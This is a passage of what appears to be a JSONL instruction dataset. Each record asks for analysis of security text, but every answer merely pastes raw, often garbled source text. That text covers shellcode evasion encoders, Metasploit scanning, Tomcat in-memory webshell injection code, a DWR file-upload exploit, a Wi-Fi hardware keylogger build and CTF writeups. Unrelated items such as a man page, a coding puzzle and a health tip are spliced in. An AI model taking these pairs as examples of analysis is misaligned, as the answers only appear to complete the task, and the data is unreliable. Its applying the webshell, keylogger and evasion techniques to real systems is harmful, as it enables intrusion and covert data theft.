NOPs  irrelevant where control flow lands.  More than 1.9M NOP instructions found! Recursive NOP generator  The NOP instructions can also be used in between the decoder instructions; adds variability to size and content of the decoder  Two types of NOPs normal NOPs and state-safe NOPs  State-safe NOP library does not contain instructions which modify the environment (stack, registers, flow control)  Only these have to be used in between instructions, else state is destroyed! Multi-Layer Ciphering  Hydra uses randomly select ciphers on the payload.  Random cipher operations: ror, rol, xor, add, sub, etc  Cipher order is random each time. No signature!  Random 32-bit keys chosen for each operation.  Six rounds of ciphering by default  can specify arbitrary any rounds. ASCII Encoder  Need to send ASCII payload to text based protocols (HTTP) to evade anomaly sensors.  Hydra picks ASCII NOPs from the NOP-generator to construct the NOP section. Choice of more than 4000 instructions.  The ASCII NOPs are also inserted in between decoder instructions and shellcode to further obfuscate both c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHigh Security Locks and Safes Michael Glasser ~ and ~ Deviant Ollam High Security Locks and Safes Why do we use locks? High Security Locks and Safes Why do we use locks? Just to keep things safe and secure? High Security Locks and Safes you can keep the contents of a room safe by wielding a heavy steel door shut High Security Locks and Safes ... or walling up the opening brick and mortar High Security Locks and Safes Locks are a delicate balance High Security Locks and Safes there are huge, safe doors at banks or the entrance to NORAD mountain... They are heavy duty but they require massive cost and effort to install, operate, and administrate High Security Locks and Safes then there is your typical master padlock... which is a breeze to use, quick to snap shut, and fast to open... too fast, since any dimwit with a shim or a bolt cutter can bypass it High Security Locks and Safes Popular high security locks attempt to go beyond the basics of what's found in standard designs and offer the user strong security without massive hardware or outrageous installation costs. High Security Locks and Safes Popular High Security Locks High Security Locks and Safes Popular High Security Locks  Medeco High Security Locks and Safes Popular High Security Locks  Medeco  Mul-T-Lock High Security Locks and Safes Popular High Security Locks  Medeco  Mul-T-Lock  SFICs High Security Locks and Safes Popular High Security Locks  Medeco  Mul-T-Lock  Others  Q & A High Security Locks and Safes Safes & Safe Locks High Security Locks and Safes Safes & Safe Locks  Safe design High Security Locks and Safes Safes & Safe Locks  Safe design  What makes a decent safe High Security Locks and Safes Safes & Safe Locks  Safe design  What makes a decent safe  Common flaws in safes High Security Locks and Safes Safes & Safe Locks  Safe design  What makes a decent safe  Common flaws in safes  Dumb installations High Security Locks and Safes Safes & Safe Locks  Safe design  What makes a decent safe  Common ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n**注**请多喝点热水或者凉白开可预防**肾结石通风**等 痛风可伴发肥胖症高血压病糖尿病脂代谢紊乱等多种代谢性疾病 **攻击机** 192.168.1.102 Debian **靶机** 192.168.1.2 Windows 7 192.168.1.115 Windows 2003 192.168.1.119 Windows 2003 **第一季主要介绍scanner下的五个模块辅助发现内网存活主机分别为** * auxiliary/scanner/discovery/arp_sweep * auxiliary/scanner/discovery/udp_sweep * auxiliary/scanner/ftp/ftp_version * auxiliary/scanner/http/http_version * auxiliary/scanner/smb/smb_version **第二季主要介绍scanner下的五个模块辅助发现内网存活主机分别为** * auxiliary/scanner/ssh/ssh_version * auxiliary/scanner/telnet/telnet_version * auxiliary/scanner/discovery/udp_probe * auxiliary/scanner/dns/dns_amp * auxiliary/scanner/mysql/mysql_version **第三季主要介绍scanner下的五个模块辅助发现内网存活主机分别为** * auxiliary/scanner/netbios/nbname * auxiliary/scanner/http/title * auxiliary/scanner/db2/db2_version * auxiliary/scanner/portscan/ack * auxiliary/scanner/portscan/tcp **第四季主要介绍scanner下的五个模块辅助发现内网存活主机分别为** * auxiliary/scanner/portscan/syn * auxiliary/scanner/portscan/ftpbounce * auxiliary/scanner/portscan/xmas * auxiliary/scanner/rdp/rdp_scanner * auxiliary/scanner/smtp/smtp_version **第五季主要介绍scanner下的三个模块以及db_nmap辅助发现内网存活主机分别为** * auxiliary/scanner/pop3/pop3_version * auxiliary/scanner/postgres/postgres_version * auxiliary/scanner/ftp/anonymous * db_nmap ### 二十一基于auxiliary/scanner/pop3/pop3_version发现内网存活主机 ```bash msf auxiliary(scanner/pop3/pop3_version) > show options Module options (auxiliary/scanner/pop3/pop3_version): Name Current Setting Required Description     RHOSTS 192.168.1.110120 yes The target address range or CIDR identifier RPORT 110 yes The target port (TCP) THREADS 50 yes The number of concurrent threads msf auxiliary(scanner/pop3/pop3_version) > exploit [*] Scanned 5 of 11 hosts (45% complete) [*] Scanned 11 of 11 hosts (100% complete) [*] Auxiliary module execution completed ``` ![](media/2582b5c030654781feac30f20350a575.jpg) ### 二十二基于auxiliary/scanner/postgres/postgres_version发现内网存活主机 ```bash msf auxiliary(scanner/postgres/postgres_version) > show options Module options (auxiliary/scanner/postgr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n背景说明 Tomcat v5 的档中 Class Loader Definitions 部分存在段区别于 tomcat v6/7/8/9 的段定义 https://tomcat.apache.org/tomcat-5.5-doc/class-loader-howto.html $CATALINA_HOME/server/lib/catalina.jar 由ClassLoader catalinaLoader 进加载且该 由该Class Loader加载的类和资源对 web application 不可 附Tomcat v6 $CATALINA_HOME/server/lib 的 Class Loader 定义 https://tomcat.apache.org/tomcat-6.0-doc/class-loader-howto.html $CATALINA_HOME/server/lib/catalina.jar -> visible Q: 这部分差异会给实战带来什么问题呢 A: 由于位于 $CATALINA_HOME/server/lib 下的类对 web app 不可意味着 web app 的线程上 下类加载器法加载到 catalina.jar 中的类, 如 org.apache.catalina.deploy.FilterDef 等, 所以会抛出 ClassNotFound 异常, 从导致内存注失败 问题重现 攻防中在注 Filter 型内存时为了减少编译时的依赖通常会使下的代码段来反射来加载相关 类 这段代码在 tomcat v6/7/8/9 上基本满需求但是当标是 Tomcat v5 时会抛出异常: ClassNotFound 如图 因为此时加载标类的 ClassLoader 不是 catalinaLoader  解决案 Class.forName 作为个来加载类的静态法共有两种式 Class.forName(String className) Class.forName(String name, boolean initialize, ClassLoader loader) 使第种时默认 loader 的值为当前类的类加载器不是 catalinaLoader 然法成功加载 try{ // tomcat v8/9 filterDef = Class.forName(\"org.apache.tomcat.util.descriptor.web.FilterDef\").newInstance(); filterMap = Class.forName(\"org.apache.tomcat.util.descriptor.web.FilterMap\").newInstance(); }catch (Exception e){ // tomcat v6/7 filterDef = Class.forName(\"org.apache.catalina.deploy.FilterDef\").newInstance(); filterMap = Class.forName(\"org.apache.catalina.deploy.FilterMap\").newInstance(); } 解决思路 调 Class.forName() 进加载类时指定 loader 为 catalinaLoader 即可 问题转变成了如何获取 catalinaLoader  解决思路 既然 web app 线程的上下类加载器不那么只需要在 tomcat 的其他线程找到 catalinaLoader 即可 遍历线程成功在 ContainerBackgroundProcessor 线程找到了符合预期的 ClassLoader, 其 URLClassPath 定义有所需要的 catalina.jar  如图 问题解决了 80%成功加载到 FilterDef 如图 Class.forName(\"org.apache.catalina.deploy.FilterDef\", true, catalinaLoader) Class.forName(\"org.apache.catalina.deploy.FilterDef\", true, threads[32].getContextClassLoader()); 剩下 20% 只需要把遍历线程的的步骤代码实现即可 成功加载到 FilterDef/FilterMap 测试效果在 Tomcat v5 注内存 Method method = Thread.class.getDeclaredMethod(\"getThreads\"); method.setAccessible(true); Thread[] threads = (", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWagging&the&Tail&&&Covert&Passive&Surveillance&and& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&how&to&make&their&life&difficult Are&You&A&Target? Three&Letter&Agencies&(TLA) NSA FBI CIA Heat&States The&Pickup& The&Follow& The&Housing Stages&of&Surveillance Static&Observation&Post& Static&Covert&Camera& Mobile&Observation&Post The&Pickup OP&Van Static&Observation&Post& Static&Covert&Camera& Mobile&Observation&Post& Surveillance&Vehicle The&Pickup A&Boot&Fit? Brevity&Codes Standby.&&Thats&the&target&out&of&his&house&wearing&a&red&baseball&cap,&blue&top,& grey&trousers&and&black&shoes.&& Target&getting&into&his&car.&&Now&moving&off&turning&left&towards&the&junction&of& High&Street&and&Water&Lane. 77.&&Alpha&One&from&Charlie&One.&&Blue&on&Grey.&&Black&shoes,&Red&Baseball&cap.& Complete&Bravo&One.&&Mobile&91&Yellow&Two Spot&Maps Target&vehicle&approaching&the&junction&of&the&B4668&and&A47.&&Target&indicating&right.&&Target&now&turned&right& heading&towards&Earl&Shilton Spot&Maps Bravo&One&at&Red&Six&intending&right.&&Bravo&One&committed&right&91&Red&Five 6 5 4 3 1 2 3 4 5 6 7 8 9 Vehicles Vary&your&route& Use&Public&Transport& Call&a&Cab Vehicle&Counter&Surveillance On&A&Long&Look OpenALPR https://github.com/openalpr/openalpr & Nosey&Parking Surveillance&Stereotypes Surveillance&Stereotypes Surveillance&Stereotypes Surveillance&Stereotypes Earpiece Inductive&Neck&Loop Antenna Pressel&Switch Complete&Kit Change&of&Appearance& Change&of&Appearance& Shoes Watches Jewellery& Use&Your&Surroundings Use&Your&Surroundings Use&Your&Surroundings Use&Your&Surroundings Decisions&Decisions Decisions&Decisions Decisions&Decisions Decisions&Decisions Hostile&Environments Hostile&Environments Hostile&Environments Misdirection Misdirection Misdirection Speech&Levels Mummy&why&is&that&strange&man&talking&about&martians&holding&sparkers? Si,&I&have&control.&&The&target&is&moving&towards&the&High&Street.& Be&aware&that&civilian&police&have&stopped&at&the&traffic&lights. Si&55,&Alpha&One&91&Hi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDGAs and Threat Intelligence John Bambenek  Fidelis Cybersecurity Threat Research Team HITCON 2015 Intro  President and Chief Forensic Examiner for Bambenek Consulting  Adjunct Faculty in CS Department at the University of Illinois at Urbana-Champaign  Producer of open-source intel feeds  Work with companies and LE all over the world to address growth in cybercrime About Threat Intelligence  Information is a set of unprocessed data that may or may not contain actionable intelligence.  Intelligence is the art of critically examining information to draw meaningful and actionable conclusions based on observations and information.  Involves analyzing adversary capabilities, intentions and motivations. Adversarial objectives  Here we are generally talking about organized crime, usually financially motivated.  What we know:  Highly rational actors  May hire outside experts for specific tasks  Generally technological sophisticated  Desire to remain quiet and resilient My Objectives  Any good intelligence program needs to also analyze your own objectives.  I investigate and try to disrupt criminal networks, so my objective is externally focused.  These efforts are directed toward criminal actors, nation-state / APT threats would require a different focus.  Most people are defensively focused so their information priorities are different. Malware C2 Network Types  Static IP / Hostname Lists  Proxied C2s  Dynamic DNS  Fast Flux / Double Flux Networks  Domain Generation Algorithms  Tor / i2p hidden services A History of Malware C2 Networks  An adversary wants to persist over the long-term and make their networks more resilient against enforcement actions.  Domains tend to be easier to take down the IPs due to avoidance of jurisdictional issues.  Development over time will largely show adversaries have acted in ways to ensure increased resiliency.  We can continue to map forward over time where they are likely to go in the future as a result. Use of Multiple Techniques  The mos", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFORENSIC ARTIFACTS FROM A PASS THE HASH (PTH) ATTACK BY: GERARD LAYGUI DISCLAIMER: THE VIEWS AND OPINIONS EXPRESSED IN THIS PRESENTATION ARE THOSE OF THE AUTHORS AND DOES NOT NECESSARILY REPRESENT THE OFFICIAL POLICY OR POSITION OF THE COMPANY THAT THE AUTHOR WORKS FOR. WHAT IS A HASH? A HASH FUNCTION IS ANY FUNCTION THAT CAN BE USED TO MAP DIGITAL DATA OF ARBITRARY SIZE TO DIGITAL DATA OF FIXED SIZE. IN THE CASE OF WINDOWS, A PASSWORD IS STORED IN EITHER A LANMAN (LM) HASH OR NT LAN MANAGER (NTLM) HASH FORMAT. WHERE ARE HASHES STORED?  The Security Accounts Manager (SAM) database.  Local Security Authority Subsystem (LSASS) process memory.  Domain Active Directory Database (domain controllers only).  The Credential Manager (CredMan) store.  LSA Secrets in the registry. HASH EXAMPLES  Plaintext = password  LM Hash E52CAC67419A9A224A3B108F3FA6CB6D  NTLM Hash 8846F7EAEE8FB117AD06BDD830B7586C PASS THE HASH (PTH) Pass the hash is a hacking technique that allows an attacker to authenticate to a remote server/service by using the underlying NTLM and/or LanMan hash of a user's password, instead of requiring the associated plaintext password. In this case, hash == password DEMO ENVIRONMENT - LOGGING CHANGES  Audit logon events - Success & Failure  Audit account management - Success & Failure  Audit account logon events - Success & Failure  Audit process tracking - Success & Failure  Audit system events - Success & Failure  Increase log file sizes Microsoft Audit Policy Recommendations - https://technet.microsoft.com/en-us/library/dn487457.aspx DEMO DOMAIN Client Windows 7 Client 2 Member Server W2K8 R2 Member Server 2 W2K12 Domain Controller ImaUser ImaDomainAdmin S-1-5- 21domain- 500 S-1-5- 21domain- 500 Windows 2012 Native Mode Domain Name: OHNOES.INTERNAL PASS THE HASH ATTACK SEQUENCE Compromise Elevate Privilege Scrape Hashes Recon Leave Backdoor (Optional) Crack Hashes (Optional) Pass The Hash Pass The Hash Recon Scrape Hashes Elevate Privilege Extract Active Directory", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH RMDIR 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 rmdir \\- 删除空目录 .SH 概述 \\fBrmdir\\fP [\\fI\\,选项\\/\\fP]... \\fI\\,目录列表\\/\\fP... .SH 描述 .\\\" Add any additional description here .PP 删除目录列表中的空目录 .TP \\fB\\-\\-ignore\\-fail\\-on\\-non\\-empty\\fP 忽略每一个仅因目录非空而导致的错误 .TP \\fB\\-p\\fP, \\fB\\-\\-parents\\fP 删除目录及其路径上的目录比如'rmdir \\fB\\-p\\fP a/b/c' 类似于 'rmdir a/b/c a/b a' .TP \\fB\\-v\\fP, \\fB\\-\\-verbose\\fP 为每一个处理过的目录输出诊断信息 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .SH 作者 由 David MacKenzie 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br 本软件是自由软件您可以自由修改和重新发布它在法律允许的范围内不提供任何保证 .SH 参见 \\fBrmdir\\fP(2) .PP .br 完整文档请见 <https://www.gnu.org/software/coreutils/rmdir> .br 或者在本地使用 info \\(aq(coreutils) rmdir invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2020/10/22 编辑 实战渗透-基于DWR框架下的漏洞探测 - Sooooooooooooooooooo,Skr!~ - Powered by Typecho https://www.websecuritys.cn/admin/write-post.php?cid=182 1/10 前言 未经授权禁止转载 0x01 前段时间,在对某站群系统进行代码审计时,发现某处DWR-AJAX接口存在文件上传漏洞 代码层: 可以清楚的看到这里是一处文件上传漏洞在进行存储的过程中未进行任何文件类型效验操作 由于是dwr框架可以通过dwr.xml 查看映射关系 public String upload(InputStream is, String fileName) { String fileUploadPath = getFileUploadPath(); String file = String.valueOf(fileUploadPath) + \"/\" + IDCreator.getRandom() + \"/\" + fileNa String fileExtName = FilenameUtils.getExtension(fileName); File f = new File(file); Properties pro = new Properties(); try { long size = is.available(); FileUtils.copyInputStreamToFile(is, f); pro.put(\"extName\", fileExtName); pro.put(\"originName\", fileName); pro.put(\"url\", file); pro.put(\"size\", Long.valueOf(size)); } catch (IOException e) { e.printStackTrace(); log.error(\"+ e); return WebTools.getCallBackJSON(0, \"); } return WebTools.getCallBackJSON(1, JSON.toJSONString(pro)); } 2020/10/22 编辑 实战渗透-基于DWR框架下的漏洞探测 - Sooooooooooooooooooo,Skr!~ - Powered by Typecho https://www.websecuritys.cn/admin/write-post.php?cid=182 2/10 注: 在没有源码的情况下可以通过访问dwr框架的接口页面 默认路径: http://localhost/dwr/index.html 有点类似于.NET平台下的ASMX接口文件且里面提供了测试方法 0x02 DWR框架所创建的ajax请求与常见的POST请求有所不同 DWR框架请求格式: 2020/10/22 编辑 实战渗透-基于DWR框架下的漏洞探测 - Sooooooooooooooooooo,Skr!~ - Powered by Typecho https://www.websecuritys.cn/admin/write-post.php?cid=182 3/10 page 为来访页面 scriptSessionId 一般为自动生成或对应Cookie中的DWRSESSIONID c0-scriptName 调用脚本名 对应 dwr.xml 中的 javascript 如: scriptName = javascript = ExtAjax 其中param为调用自定义的类 methodName 为类中的方法名 c0-param0为参数如方法接收3个参数那么就是0到2 如:c0-param0 ,c0-param1,c0-param2 按顺序传递 0x03 由于目标系统是文件上传需要输入流InputStream那么格式应该还会有所不同所以这里我按 照网上的相关方法在本地搭建了一个环境 参考文章:https://my.oschina.net/u/1474779/blog/610668 所需jar包: (要实现文件上传必须引入commons-fileupload包) commons-logging-1.1.1.jar dwr.jar commons-fileupload-1.3.1.jar commons-io-2.4.jar Upload.Java 2020/10/22 编辑 实战渗透-基于DWR框架下的漏洞探测 - Sooooooooooooooooooo,Skr!~ - Powered by Typecho https://www.websecuritys.cn/ad", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Simon and Speck Block Ciphers 这是一组姐妹轻量级加密 ## Simon Block Cipher ### 基本介绍 Simon 块加密算法由 NSA 2013 年 6 月公布主要在**硬件实现**上进行了优化 Simon Block Cipher 是平衡的 [Feistel cipher](https://en.wikipedia.org/wiki/Feistel_cipher) 加密一共有两块若每块加密的大小为 n bits那么明文的大小就是 2n bits此外一般来说该加密中所使用的密钥长度是块长度的整数倍比如 2n4n等常见的 Simon 加密算法有 一般来说Simon 算法称之为 Simon 2*n*/nmn 为块大小m 是块大小与密钥之间的倍数比如说 Simon 48/96 就是指明文是 48 比特密钥是 96 比特的加密算法 此外对于 Simon 块加密算法来说每轮的加密过程一样如下 当然对于每一轮以及不同的 m 来说密钥也会有所不同 其中 $z_j$ 是由 Linear Feedback Shift Register (LFSR) 生成的虽然对于不同的 $z_j$ 的逻辑不同但是初始向量是固定的 | Constant | | :--------------------------------------: | | $z_{0}$=11111010001001010110000111001101111101000100101011000011100110 | | $z_{1}$=10001110111110010011000010110101000111011111001001100001011010 | | $z_{2}$=10101111011100000011010010011000101000010001111110010110110011 | | $z_{3}$=11011011101011000110010111100000010010001010011100110100001111 | | $z_{4}$=11010001111001101011011000100000010111000011001010010011101111 | ### 2017 SECCON Simon and Speck Block Ciphers 题目描述如下 ``` Simon and Speck Block Ciphers https://eprint.iacr.org/2013/404.pdf Simon_96_64, ECB, key=\"SECCON{xxxx}\", plain=0x6d564d37426e6e71, cipher=0xbb5d12ba422834b5 ``` 从名字中可以看出密钥是 96 比特12 byte明文是 64 比特8字节而密钥已经给出了 8 个字节只剩下四个字节未知那我们可以使用暴力破解的方法这里从 https://github.com/bozhu/NSA-ciphers/blob/master/simon.py 获取了一份 simon 加密算法 具体如下 ```python from pwn import * from simon import SIMON plain = 0x6d564d37426e6e71 cipher = 0xbb5d12ba422834b5 def compare(key): key = \"SECCON{\" + key + \"}\" key = key.encode('hex') key = int(key, 16) my_simon = SIMON(64, 96, key) test = my_simon.encrypt(plain) if test == cipher: return True else: return False def solve(): visible = string.uppercase + string.lowercase + string.digits + string.punctuation + \" \" key = pwnlib.util.iters.mbruteforce(compare, visible, 4, method=\"fixed\") print key if __name__ == \"__main__\": solve() ``` 结果如下 ```shell  2017_seccon_simon_and_speck_block_ciphers git:(master) python exp.py [+] MBruteforcing: Found key: \"6Pz0\" ``` ## 参考文", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### PE 简介 PE 文件的全称是 Portable Executable 意为可移植的可执行的文件常见的EXEDLLOCXSYSCOM都是PE 文件PE 文件是微软Windows操作系统上的程序文件可能是间接被执行如DLL 一个 32-bits 的 PE 文件布局如下图所示 ```text +-------------------------------+ \\ | MS-DOS MZ header | | +-------------------------------+ | | MS-DOS Real-Mode Stub program | | +-------------------------------+ | | PE Signature | | -> PE file header +-------------------------------+ | | IMAGE_FILE_HEADER | | +-------------------------------+ | | IMAGE_OPTIONAL_HEADER | | +-------------------------------+ / | section header #1 | +-------------------------------+ | section header #2 +------------------------- : : +------------------------------+ | section #1 | +------------------------------+ | section #2 +-------------------- : : ``` 接下来将会以一个 32-bit 的 PE 文件作为标本介绍一下 PE 文件 ```c // 示例代码 test.c #include <stdio.h> int main(){ printf(\"Hello, PE!\\n\"); return 0; } ``` **通过 `Devcpp` 软件的 `TDM-GCC 4.9.2 32-bit Release` 方式编译文件生成 `test.exe`作为示例文件** ### PE 文件常用术语及其含义 - **`映像文件` 因为 PE 文件通常需要加载到内存中才能执行相当于内存中的映像所以 PE 文件也叫做映像文件** - **`RVA` 相对虚拟地址映像文件在虚拟内存中相对于加载基址的偏移** - **`VA` 虚拟地址映像文件在虚拟内存中的地址** - **`FOA` 文件偏移地址映像文件在磁盘文件中相对于文件开头的偏移** 因为不论是在磁盘文件上或是在虚拟内存中数据相对于其所在节的相对偏移是固定的据此可以实现 RVA 与 FOA 之间的转换即`RVA - 节区RVA = FOA - 节区FOA` 假设某一个属于 .data 节的数据的 RVA 是 0x3100.data 节的 节区RVA 为 0x3000那么该数据相对于 .data 节的相对偏移就是 0x100而 .data 节在的 节区FOA 为 0x1C00那么该数据在磁盘文件中的 FOA 就是 0x1D00完整的计算公式是`FOA = 节区FOA + (RVA - 节区RVA)`如果该映像文件的加载基址为0x40000000那么该数据的 VA 就是 0x40003100 ### PE文件头解释 PE 文件的最开始便是 PE 文件头它由 `MS-DOS 文件头` 和 `IMAGE_NT_HEADERS` 结构体组成 ### MS-DOS 文件头解释 `MS-DOS 文件头` 包含 `IMAGE_DOS_HEADER` 和 `DOS Stub` 两个部分 `IMAGE_DOS_HEADER` 结构体的定义如下 ```c typedef struct _IMAGE_DOS_HEADER { WORD e_magic; // \"MZ\" WORD e_cblp; WORD e_cp; WORD e_crlc; WORD e_cparhdr; WORD e_minalloc; WORD e_maxalloc; WORD e_ss; WORD e_sp; WORD e_csum; WORD e_ip; WORD e_cs; WORD e_lfarlc; WORD e_ovno; WORD e_res[4]; WORD e_oemid; WORD e_oeminfo; WORD e_res2[10]; LONG e_lfanew; // NT 头相对于文件起始处的偏移 } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER; ``` `IMAGE_DOS_H", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# HID-USBKeyLogger > 文章作者 [Sarah-Briggs](https://github.com/Sarah-Briggs) & [Atomic-Crash](https://github.com/Atomic-Crash) & [r0fus0d](https://github.com/No-Github) > 注 : 笔记中源代码和相应库在其图片目录下 <p align=\"center\"> <img src=\"../../../../../assets/img/banner/HID-USBKeylogger.jpg\"> </p> --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **文章/教程** - [手把手教你DIY一个硬件键盘记录器](https://www.freebuf.com/geek/241398.html) - [50元制作PS2键盘无线监控装置 ](https://www.freebuf.com/geek/58895.html) **资源** - [spacehuhn/wifi_keylogger](https://github.com/spacehuhn/wifi_keylogger) --- ## 简介 硬件键盘记录器在国内外的电商上有很多成品但是价格略贵那么本次参考 freebuf 上教程自己制作一个 既然要做成无线版的较为靠谱的就是在原硬件上加焊 wifi 芯片使攻击者可以在以其为中心的 WiFi 覆盖范围内获取信息 主要思路就是做一个基于 ESP8266+CH9350 的键盘记录器且带有 Wi-Fi 功能可以存储记录到的键盘输入并可以通过其发出的 Wi-Fi 网络在手机端查看记录到的用户键入数据 --- ## 制作过程 ### WiFi模块 WiFi 部分选用 ESP8266 芯片廉价而且功能强大的 SOC(系统级芯片)广泛应用与物联网领域这里使用了 ESP8266-07S 模块体积非常小而且引出了常用的引脚满足于该设计的需要 ESP8266 芯片使用了 3.3V 的直流电源体积小功耗低支持透传丢包率较低重点是便宜 相应的还有 ESP8266-0203 等等它们使用的核心芯片都是相同的唯一不同就是引出的引脚不同而且有的系列对核心芯片还加了金属屏蔽壳有的可外接陶瓷天线等 ESP-07 则是带外置天线的就算使用环境有信号屏蔽也还有一定改善的余地 --- ### 键盘记录部分 这里采用 CH9350 芯片用于将 HID 协议转换为 UART 协议以便分析记录键盘数据后端的数据分析和记录在 ESP8266 上实现 CH9350 是一款 USB 键鼠转串口通讯控制芯片它可以将 HID 协议和 UART() 协议互相转换而且完成度很高性价比十足 --- ### 整体电路设计 我们要使用 CH9350 将 USB 键盘的 HID 协议转为 UART 协议使用 ESP8266 解析和记录键盘输入内容并且提供 WI-FI 访问功能电路图和 PCB 图如下 - https://lceda.cn/editor#id=1c71835d278545a79ea0c36eabb426a3 - https://lceda.cn/editor#id=bc6800ad5bce4ea4b76987282ac3377f - 左下角是电源模块前面固件选用时提到过WiFi 芯片 ESP8266 是使用的 3.3V 供电USB 接口都是 5V 的供电输入强行直连会导致电大过大从而引起升温甚至烧毁因此本设计需要采用 AMS1117-3.3 芯片进行降压处理 - 正下方是 ESP8266-07S 模块我们使用它的通用异步收发传输接口-RXD(接收端)来接收上面两片 CH9350 芯片发出的数据它连接到键盘端 CH9350 的 UART 的 TX(发送端)旁听这两片 CH9350 之间的通讯内容这样排布的一个好处就是键盘记录器的分析模块站在了旁观者的角度即使它出现了解析速度慢甚至宕机的情况也不会对键盘产生任何影响(就算卡也卡不到受害者) - 正中央的两颗芯片是 CH9350根据官方使用手册使用两颗 CH9350 分别作为**连接键盘的下位机和连接电脑的上位机**统一使用 3.3V 降压模块进行供电 - 两侧是 USB 接头和母座用于插入电脑的 USB 接口和连接 USB 键盘(这两个有实物图上面提及的芯片在\"研发时期\"不幸烧毁没得看了) --- ### 固件部分 具体的键盘数据解析数据存储Wi-Fi 功能是需要我们编写相关程序的再烧录进 ESP8266 固件中最后在底板上进行模块化拼接后使用 ESP8266 支持通过 Arduino 开发这", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Ransom 2.0, RE, 150pts > In theory, this firmware mod was supposed to give you 30% extra horsepower and torque. In reality, it's something different. For real this time. This is the exact same challenge as `Ransom`, except this time with the password checking bugfix. Reversing the code checking routine revealed the underlying algorithm, which we rewrote into C: ```c #include <stdint.h> #include <stdio.h> uint16_t cash = 0x1337; uint16_t get(uint16_t n) { while (n--) { cash = (((cash  (cash >> 2)  (cash >> 3)  (cash >> 5)) & 1) << 15) | (cash >> 1); } return cash; } int main() { uint8_t id[] = \"\\x38\\x35\\x32\\x07\\x19\\x00\\x14\\x00\"; for (int i = 0; i < 8; i++) { uint16_t x = id[i] + (id[i+1] * 256); uint16_t f = get(x  (0xcafe << i)); printf(\"%02X%02X\", f & 0xff, (f >> 8) & 0xff); } printf(\"\\n\"); } ``` Running this yields the password, which upon typing it into UART interface, gives us the flag.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 53. 数字在排序数组中出现的次数 ## 题目链接 [牛客网](https://www.nowcoder.com/practice/70610bf967994b22bb1c26f9ae901fa2?tpId=13&tqId=11190&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 ```html Input: nums = 1, 2, 3, 3, 3, 3, 4, 6 K = 3 Output: 4 ``` ## 解题思路 只要能找出给定的数字 k 在有序数组第一个位置和最后一个位置就能知道该数字出现的次数 先考虑如何实现寻找数字在有序数组的第一个位置正常的二分查找如下在查找到给定元素 k 之后立即返回当前索引下标 ```java public int binarySearch(int[] nums, int K) { int l = 0, h = nums.length - 1; while (l <= h) { int m = l + (h - l) / 2; if (nums[m] == K) { return m; } else if (nums[m] > K) { h = m - 1; } else { l = m + 1; } } return -1; } ``` 但是在查找第一个位置时找到元素之后应该继续往前找也就是当 nums[m]\\>=k 时在左区间继续查找左区间应该包含 m 位置 ```java private int binarySearch(int[] nums, int K) { int l = 0, h = nums.length; while (l < h) { int m = l + (h - l) / 2; if (nums[m] >= K) h = m; else l = m + 1; } return l; } ``` 查找最后一个位置可以转换成寻找 k+1 的第一个位置并再往前移动一个位置 ```java public int GetNumberOfK(int[] nums, int K) { int first = binarySearch(nums, K); int last = binarySearch(nums, K + 1); return (first == nums.length || nums[first] != K) ? 0 : last - first; } ``` 需要注意以上实现的查找第一个位置的 binarySearch 方法h 的初始值为 nums.length而不是 nums.length - 1先看以下示例 ``` nums = [2,2], k = 2 ``` 如果 h 的取值为 nums.length - 1那么在查找最后一个位置时binarySearch(nums, k + 1) - 1 = 1 - 1 = 0这是因为 binarySearch 只会返回 [0, nums.length - 1] 范围的值对于 binarySearch([2,2], 3) 我们希望返回 3 插入 nums 中的位置也就是数组最后一个位置再往后一个位置即 nums.length所以我们需要将 h 取值为 nums.length从而使得 binarySearch 返回的区间更大能够覆盖 k 大于 nums 最后一个元素的情况", "category": "text_analysis", "source": "security_papers"}
